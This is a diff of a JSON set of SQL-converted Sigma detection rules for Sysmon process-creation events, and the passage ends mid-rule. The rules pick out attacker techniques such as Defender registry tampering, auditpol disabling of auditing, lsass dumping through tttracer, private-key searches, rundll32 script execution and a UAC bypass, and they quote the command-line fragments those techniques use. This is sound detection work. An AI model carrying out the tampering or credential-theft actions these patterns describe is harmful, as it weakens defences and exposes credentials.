"395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", - "author": "frack113", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - "title": "Discovery of a System Time", - "id": "b243b280-65fe-48df-ba07-6ddea7646427", - "status": "test", - "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the system utilities to discover system time for legitimate reason" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_time_discovery.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", + "status": "test", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_lolbin_tracker.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "status": "experimental", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Wlrmdr Lolbin Use as Launcher", + "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", + "author": "frack113, manasmbellani", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_lolbin_wlrmdr.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Rundll32 Script in CommandLine", + "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "status": "experimental", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "frack113, Zaw Min Htun (ZETA)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_rundll32_script_run.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Registration via cscript.exe", + "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "status": "experimental", + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", - "status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", - "tags": [ - "attack.execution", - "attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "status": "experimental", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Capture Credentials with Rpcping.exe", + "id": "93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server 